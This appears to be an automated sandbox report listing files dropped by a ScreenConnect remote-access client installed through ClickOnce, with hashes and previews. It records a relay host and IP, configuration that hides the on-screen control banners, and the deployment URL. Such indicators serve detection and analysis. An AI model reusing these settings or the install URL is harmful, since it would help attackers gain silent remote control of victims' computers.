                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\Client.Override.resources

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):256
                                                                                                                                                                                                                                                        Entropy (8bit):4.878405169379307
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:8kVXdyrKDLIP12MUAvvR+ojlX2epExpKCl1nSJkw:rHy2DLI4MWoj12eKfKCKB
                                                                                                                                                                                                                                                        MD5:B5450F2285052D7D31714E92BAE6143E
                                                                                                                                                                                                                                                        SHA1:0904C6FE250983A97D5210DFEACCB1C1CF34D643
                                                                                                                                                                                                                                                        SHA-256:23054E289EB585EB0314C44FD753ED3803C012E06B954926F3FC7167A370F928
                                                                                                                                                                                                                                                        SHA-512:79DA469F0C4ACB50D9B399086ED171C69E00C4CF5CB8A2089FD49F5864C1BF46E8434FB23CD210ABB83B88FF06E435A92C8E926B435BFB03EA207D5D7069723E
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP..........6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r.......#03c6fc

                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\Client.en-US.resources

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):50133
                                                                                                                                                                                                                                                        Entropy (8bit):4.759054454534641
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:1536:p1+F+UTQd/3EUDv8vw+Dsj2jr0FJK97w/Leh/KR1exJKekmrg9:p1+F+UTQWUDv8vw+Dsj2jr0FJK97w/LR
                                                                                                                                                                                                                                                        MD5:D524E8E6FD04B097F0401B2B668DB303
                                                                                                                                                                                                                                                        SHA1:9486F89CE4968E03F6DCD082AA2E4C05AEF46FCC
                                                                                                                                                                                                                                                        SHA-256:07D04E6D5376FFC8D81AFE8132E0AA6529CCCC5EE789BEA53D56C1A2DA062BE4
                                                                                                                                                                                                                                                        SHA-512:E5BC6B876AFFEB252B198FEB8D213359ED3247E32C1F4BFC2C5419085CF74FE7571A51CAD4EAAAB8A44F1421F7CA87AF97C9B054BDB83F5A28FA9A880D4EFDE5
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP.q...'..6....wp.......y....C|.)>..Ldt..... $...X..........1$.../...2.%%3./>>...L.y.0.C._.........1Y..Qj.o....<....=...R..;...C....&.......1p2.r.x.u?Y..R...c......X.....I.5.2q..R...>.E.pw .@ ).w.l.....S...X..'.C.I......-.Y........4.J..P<.E..=c!.@To..#.._.2.....K.!..h...z......t......^..4...D...f..Q...:..%.z.<......^.....;<...r..yC.....Q........4_.Sns..z.......=..]t...X..<....8.e`}..n....S.H[..S@?.~....,...j.2..*v.......B....A...a......D..c..w..K,..t...S.....*v....7.6|..&.....r....#....G......Y...i..'.............'.......Z.....#2e..........|....)..%....A.....4{..u;N......&q...}.tD..x.....4...J...L......5.Q..M....K..3U..M..............5...........t.>.......lYu....3TY.?...r...'.......3.m........=.H...#.o.........n.....,4.~...<h..u...i.H...V......V/...P.$%..z...

                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\Client.resources

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):26722
                                                                                                                                                                                                                                                        Entropy (8bit):7.7401940386372345
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:384:rAClIRkKxFCQPZhNAmutHcRIfvVf6yMt+FRVoSVCdcDk6jO0n/uTYUq5ZplYKlBy:MV3PZrXgTf6vEVm6zjpGYUElerG49
                                                                                                                                                                                                                                                        MD5:5CD580B22DA0C33EC6730B10A6C74932
                                                                                                                                                                                                                                                        SHA1:0B6BDED7936178D80841B289769C6FF0C8EEAD2D
                                                                                                                                                                                                                                                        SHA-256:DE185EE5D433E6CFBB2E5FCC903DBD60CC833A3CA5299F2862B253A41E7AA08C
                                                                                                                                                                                                                                                        SHA-512:C2494533B26128FBF8149F7D20257D78D258ABFFB30E4E595CB9C6A742F00F1BF31B1EE202D4184661B98793B9909038CF03C04B563CE4ECA1E2EE2DEC3BF787
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP)...s^.J.....E.....(....jF.C...1P)...H..../..72J..I.J.a.K8c._.ks`.k.`.kK..m.M6p............b...P...........'...!...............K...............w.......P.......1......."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.1.6.....$A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.2.5.6....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.3.2....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.4.8.....,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.B.l.a.n.k.1.6.;...(A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.M.a.c.2.2.....0A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.O.p.a.q.u.e.1.9.2.8...,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.T.i.t.l.e.1.6.....6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r.4...6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.:...DB.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.V.i.s.i.b.l.e.xb..*B.l.a.n.k.M.o.n.i.t.o.r.T.e.x.t.C.o.l.o.r..b..*D.a.r.k.T.h.e.m.e.B.a.r.B.a.s.e.C.o.l.o.r..b..<D.a.r.k.T.h.

                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\app.config

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):2089
                                                                                                                                                                                                                                                        Entropy (8bit):4.688974504275539
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:48:OhMOdH55AfdH85AfdHfh/dH8h/dHmh/dHH/dHS/dH0/dHjdH6dH/dHAdHKdH3dHK:o3H52H82HzHAHyHVHeHMHZHUH1HyHkHY
                                                                                                                                                                                                                                                        MD5:6E88FAD97F4CFC0339D8D71F55326EDF
                                                                                                                                                                                                                                                        SHA1:7FE09E6D87B7CA210C8D7AFA9D69380528A6D4F2
                                                                                                                                                                                                                                                        SHA-256:F09E170444003576AD24985C8B4873E7CBDC18863A4943A1FDEB0E3249812806
                                                                                                                                                                                                                                                        SHA-512:023175F24C652E73946A01DB84579BAF00D4447AFA01CD2EA09820964DCA10D9C24C7DD7F37109A836996477B4C9804B75830C95A790B5598564395272F98A15
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:<?xml version="1.0"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="ShowFeedbackSurveyForm" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportShowUnderControlBanner" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessShowUnderControlBanner" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportHideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessHideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="HideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportShowBalloonOnConnect" serializeAs="String">.. <value>fa

                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\buxsurwv.newcfg

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe
                                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):562
                                                                                                                                                                                                                                                        Entropy (8bit):5.07472095669198
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOKTQCDe05/vXbAa3xT:2dL9hK6E46YPoXdRvH
                                                                                                                                                                                                                                                        MD5:2C3CAC6AD93194810D9F78DF367938C0
                                                                                                                                                                                                                                                        SHA1:5BEB69CA0EBA75C96F5400626128E3F4884590E2
                                                                                                                                                                                                                                                        SHA-256:B954BEDC5C99432A2B99AB5A8627B01671575E77035F7A4589F6647632EA4751
                                                                                                                                                                                                                                                        SHA-512:7BD7E4D8B106D2A5269EFB7F4B1446FF308BFA2C417974EA626F608E3DECE7F0A57AFA0384D126D269DEEC70198953DA8AE3BFBE66951CAC35EEF7561130D7A2
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>kjh231a.zapto.org=79.110.49.185-25%2f10%2f2024%2017%3a27%3a56</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>

                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\user.config (copy)

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe
                                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):562
                                                                                                                                                                                                                                                        Entropy (8bit):5.07472095669198
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOKTQCDe05/vXbAa3xT:2dL9hK6E46YPoXdRvH
                                                                                                                                                                                                                                                        MD5:2C3CAC6AD93194810D9F78DF367938C0
                                                                                                                                                                                                                                                        SHA1:5BEB69CA0EBA75C96F5400626128E3F4884590E2
                                                                                                                                                                                                                                                        SHA-256:B954BEDC5C99432A2B99AB5A8627B01671575E77035F7A4589F6647632EA4751
                                                                                                                                                                                                                                                        SHA-512:7BD7E4D8B106D2A5269EFB7F4B1446FF308BFA2C417974EA626F608E3DECE7F0A57AFA0384D126D269DEEC70198953DA8AE3BFBE66951CAC35EEF7561130D7A2
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>kjh231a.zapto.org=79.110.49.185-25%2f10%2f2024%2017%3a27%3a56</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>

                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..vice_4b14c015c87c1ad8_0018.0002_none_0518bf34930ba5ea\ScreenConnect.ClientService.dll

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):68096
                                                                                                                                                                                                                                                        Entropy (8bit):6.069003835678311
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:1536:vA0ZscQ5V6TsQqoSDih6+39QFVIl1LJhb8gF:o0Zy3IUOQFVQLJF
                                                                                                                                                                                                                                                        MD5:47C0BF8CC60128C530A930637822EA78
                                                                                                                                                                                                                                                        SHA1:6FBAF1C36AF7DFCA4B4970A9F71C1DCD8B7A57F9
                                                                                                                                                                                                                                                        SHA-256:EA71F7DCBE7E754EEF4ED40A931EDA12FEF7063B173A5B1D5095F683B254504C
                                                                                                                                                                                                                                                        SHA-512:D2CBF3BCC53D0D340984617867F22CB43CE5A336B7B844E2F339B308FF28C955F5F3C7217C5ECDFE509B45DBD519BD733C3C9B9C6B8ABA945B8E6A288B495B17
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....k............" ..0.............. ... ...@....... ....................................@.................................e ..O....@.......................`..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................. ......H........n..@...................<.........................................(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*.~,...%-.&~+.....i...s....%.,...(...+*vs....%.}P.........s....(....*....0...........s....}.....s....}...........}.......(&.....}.....(....&.()..........s....o.....()...~-...%-.&~+.....j...s....%.-...o ....s!...}.....s"...}.....s#...}...... .... 0u.........s....s=...}....... ..6........s....s=...}.....('...($............o%........

                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1373
                                                                                                                                                                                                                                                        Entropy (8bit):5.369201792577388
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:ML9E4KQ71qE4GIs0E4KaXE4qpAE4KKUNKKDE4KGKZI6KhPKIE4TKBGKoM:MxHKQ71qHGIs0HKEHmAHKKkKYHKGSI65
                                                                                                                                                                                                                                                        MD5:1BF0A215F1599E3CEC10004DF6F37304
                                                                                                                                                                                                                                                        SHA1:169E7E91AC3D25D07050284BB9A01CCC20159DE7
                                                                                                                                                                                                                                                        SHA-256:D9D84A2280B6D61D60868F69899C549FA6E4536F83785BD81A62C485C3C40DB9
                                                                                                                                                                                                                                                        SHA-512:68EE38EA384C8C5D9051C59A152367FA5E8F0B08EB48AA0CE16BCE2D2B31003A25CD72A4CF465E6B926155119DAB5775A57B6A6058B9E44C91BCED1ACCB086DB
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..2,"System.Deployment, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, Pu

                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\dfsvc.exe.log

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                                        Size (bytes):1662
                                                                                                                                                                                                                                                        Entropy (8bit):5.368796786510097
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:48:M1H2HKQ71qHGIs0HKGAHKKkKYHKGSI6oPtHTH+JHvHlu:gWq+wmj0qxqKkKYqGSI6oPtzHIPQ
                                                                                                                                                                                                                                                        MD5:F133699E2DFF871CA4DC666762B5A7FF
                                                                                                                                                                                                                                                        SHA1:185FC7D230FC1F8AFC9FC2CF4899B8FFD21BCC57
                                                                                                                                                                                                                                                        SHA-256:9BA0C7AEE39ACD102F7F44D289F73D94E2FD0FCD6005A767CD63A74848F19FC7
                                                                                                                                                                                                                                                        SHA-512:8140CDCE2B3B92BF901BD143BFC8FB4FE8F9677036631939D30099C7B2BB382F1267A435E1F5C019EFFFF666D7389F77B06610489D73694FA31D16BD04CAF20A
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Deployment, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, Pu

                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ScreenConnect.ClientService.exe.log

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe
                                                                                                                                                                                                                                                        File Type:CSV text
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):847
                                                                                                                                                                                                                                                        Entropy (8bit):5.345615485833535
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:ML9E4KlKDE4KhKiKhPKIE4oKNzKoZAE4KzeR:MxHKlYHKh3oPtHo6hAHKzeR
                                                                                                                                                                                                                                                        MD5:EEEC189088CC5F1F69CEE62A3BE59EA2
                                                                                                                                                                                                                                                        SHA1:250F25CE24458FC0C581FDDF59FAA26D557844C5
                                                                                                                                                                                                                                                        SHA-256:5345D03A7E6C9436497BA4120DE1F941800F2522A21DE70CEA6DB1633D356E11
                                                                                                                                                                                                                                                        SHA-512:2E017FD29A505BCAC78C659DE10E0D869C42CE3B057840680B23961DBCB1F82B1CC7094C87CEEB8FA14826C4D8CFED88DC647422A4A3FA36C4AAFD6430DAEFE5
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..

                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\5W9VLRZG.log

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with very long lines (620), with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):14980
                                                                                                                                                                                                                                                        Entropy (8bit):3.817098199869787
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:96:t6BKasdrv5yInMSiY7bBBaOy0lCsdrv5yInMSiY+g3+/Z8ZkgGsdrv5yInMSiY/Y:D5y8V7baQ5y8VnuO5y8V5JLEv
                                                                                                                                                                                                                                                        MD5:DC38212BE898C70A42355CCFE35BF1D0
                                                                                                                                                                                                                                                        SHA1:554F38DE323D7ACA5A02A1C0449551C9ADE5D8D5
                                                                                                                                                                                                                                                        SHA-256:2EC80884FB15E5413E1B117326FE1A4EF11978AB838AD47C2BAA22FB0B9D34C6
                                                                                                                                                                                                                                                        SHA-512:A56E4A20D773841464B0C8D55BCD5592A6E72BCBAF76C7D90D8EEAED58EBC1259D77904E122EF1D10F724BEC544BE0716C7511E752DCC1E2781E24C403B319FF
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:..P.L.A.T.F.O.R.M. .V.E.R.S.I.O.N. .I.N.F.O.......W.i.n.d.o.w.s. .......:. .1.0...0...1.9.0.4.5...0. .(.W.i.n.3.2.N.T.).......C.o.m.m.o.n. .L.a.n.g.u.a.g.e. .R.u.n.t.i.m.e. ...:. .4...0...3.0.3.1.9...4.2.0.0.0.......S.y.s.t.e.m...D.e.p.l.o.y.m.e.n.t...d.l.l. .....:. .4...8...4.2.7.0...0. .b.u.i.l.t. .b.y.:. .N.E.T.4.8.R.E.L.1.L.A.S.T._.C.......c.l.r...d.l.l. .......:. .4...8...4.5.1.5...0. .b.u.i.l.t. .b.y.:. .N.E.T.4.8.R.E.L.1.L.A.S.T._.C.......d.f.d.l.l...d.l.l. .......:. .4...8...4.2.7.0...0. .b.u.i.l.t. .b.y.:. .N.E.T.4.8.R.E.L.1.L.A.S.T._.C.......d.f.s.h.i.m...d.l.l. .......:. .1.0...0...1.9.0.4.1...3.0.0.0.0. .(.W.i.n.B.u.i.l.d...1.6.0.1.0.1...0.8.0.0.).........S.O.U.R.C.E.S.......D.e.p.l.o.y.m.e.n.t. .u.r.l.......:. .h.t.t.p.s.:././.s.e.c.u.r.e...s.t.a.n.s.u.p...c.o.m./.B.i.n./.S.c.r.e.e.n.C.o.n.n.e.c.t...C.l.i.e.n.t...a.p.p.l.i.c.a.t.i.o.n.?.e.=.S.u.p.p.o.r.t.&.y.=.G.u.e.s.t.&.h.=.k.j.h.2.3.1.a...z.a.p.t.o...o.r.g.&.p.=.8.0.4.1.&.s.=.a.e.0.9.5.c.2.3.-.8.e.2.2.-.4.7.4.7.-.b.9.a.

                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.Client.dll

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):197120
                                                                                                                                                                                                                                                        Entropy (8bit):6.584712994459805
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3072:mxGtNaldxI5KY9h12MMusqVFJRJcyzvfquFzDvJXYyB:1tNalc5fr12MbPJY8quFGy
                                                                                                                                                                                                                                                        MD5:4D94014D41DE954AEE952C1B930BA395
                                                                                                                                                                                                                                                        SHA1:35A776D4B569C5367F61A68A577CE92086E682E2
                                                                                                                                                                                                                                                        SHA-256:AD8FC048CE7A61C1AF0428B7B3989163A215A9378417CAC6FBF232D0538405C3
                                                                                                                                                                                                                                                        SHA-512:0ACA355B24FAF86B6C321E88321EFF542F277331745010C3A495AAE6F2F123E518284CB7445F78A83BCE3A61BDFFD1AA3FC082E7DC854218B5D7AF95478414F8
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5............" ..0.................. ... ....... .......................`......].....@.................................-...O.... ..|....................@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc...|.... ......................@..@.reloc.......@......................@..B................a.......H...........(............^................................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*..{....*:.(......}....*.0..A........(....s....%.~(...%-.&~'.....y...s....%.(...(...+(...+o"...o....*....0..s.......~#.....2. ....+...j..... ......... ...............%.r...p.%.r...p............%.&...($....5..............s%....=...*..0...........~*...%-.&~).....|...s&...%.*...(...+..~+...%-.&~).....}...s(...%.+...(...+.r9..

